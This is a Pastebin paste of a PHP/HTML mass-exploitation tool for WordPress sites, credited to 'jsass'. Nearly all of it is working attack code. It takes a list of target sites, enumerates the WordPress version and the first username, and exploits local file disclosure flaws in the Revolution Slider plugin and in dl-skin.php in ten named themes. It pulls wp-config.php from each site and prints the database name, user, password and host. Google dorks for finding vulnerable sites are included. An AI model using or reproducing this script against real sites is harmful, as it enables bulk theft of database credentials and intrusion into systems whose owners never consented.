Googleinurl

[SCRIPT]=> Exploits Wordpress LFD

Aug 23rd, 2014
1,287
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <body>
  3. <pre><center>                  
  4.  
  5.  
  6.         <h2>Exploits Wordpress LFD </h2>
  7.        
  8.             <p>Coded by jsass , Twitter : @kwSecurity</p>
  9.  
  10. _______________________________________________________________
  11.  
  12.     <pre><hre>
  13.     <form method='POST'>
  14.     <textarea name='sites' cols='45' rows='15'></textarea>
  15.     <input type='submit' value='Exploit' /><br>
  16.     </form>
  17.  
  18.  
  19. <?php
  20.  
  21. # Coded by : jsass
  22. # Exploits Wordpress LFD
  23. # Twitter : @KwSecurity
  24. # Great's To Sec4ever.com &
  25.  
  26. /**
  27.  Dork Google: revslider.php "index of"
  28.  "wp-content/themes/construct/"
  29.  "wp-content/themes/persuasion"
  30.  "wp-content/themes/manbiz2"
  31.  "wp-content/themes/elegance"
  32.  "wp-content/themes/modular/"
  33.  "wp-content/themes/myriad/"
  34.  "wp-content/themes/echelon/"
  35.  "wp-content/themes/fusion/"
  36.  "wp-content/themes/awake/"
  37. **/
  38.  
  39.  
  40.  
  41. @set_time_limit(0);
  42. ob_implicit_flush(true);
  43. ob_end_flush();
  44.  
  45. $sites = explode("\r\n", $_POST['sites']);
  46.  
  47. foreach($sites as $site) {
  48.  
  49. $site = trim($site);
  50.  
  51. $ch = curl_init();
  52. curl_setopt($ch, CURLOPT_URL, "$site");
  53. curl_setopt($ch, CURLOPT_HEADER, 1);
  54. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  55. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  56. $get = curl_exec($ch);
  57. curl_close($ch);
  58.     if(preg_match("#WordPress (.*?)/>#", $get, $version)){
  59.     $str = str_replace('/>', "", $version[0]);
  60.     $str = str_replace('"', "", $str);
  61.    
  62.     $users = @file_get_contents("$site/?author=1");
  63.     preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  64.     $wpuser = explode('|',$user[1]);
  65. echo " <br>-----------------------------------</br>";
  66. echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
  67.    
  68.     # Dork Google: revslider.php "index of"
  69.  
  70. $ch = curl_init();
  71. curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
  72. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  73. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  74. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  75. $xp = curl_exec ($ch);
  76. curl_close($ch);
  77.  
  78. if(preg_match("#DB_USER#i",$xp)){
  79. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  80. echo "DB_NAME:{$DB_NAME[1]}<br>";
  81. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  82. echo "DB_USER:{$DB_USER[1]}<br>";
  83. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  84. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  85. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  86. echo "DB_HOST:{$DB_HOST[1]}<br>";
  87.  
  88. }
  89.  
  90. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php");
  91.     foreach($lt as $l){
  92.     $site = "$site/$l";
  93. $process = curl_init($site);
  94. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  95. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
  96. curl_setopt($process, CURLOPT_HEADER, TRUE);
  97. curl_setopt($process, CURLOPT_POST, 1);
  98. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
  99. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  100. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
  101. $return = curl_exec($process);
  102. if(preg_match("#DB_USER#i",$return)){
  103. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  104. echo "DB_NAME:{$DB_NAME[1]}<br>";
  105. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  106. echo "DB_USER:{$DB_USER[1]}<br>";
  107. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  108. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  109. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  110. echo "DB_HOST:{$DB_HOST[1]}<br>";
  111. break;
  112. echo " <br>-----------------------------------</br>";
  113.  
  114. }
  115. }
  116. }
  117.  
  118. ?>
  119. </html>
  120. </body>
  121. </pre></center>
RAW Paste Data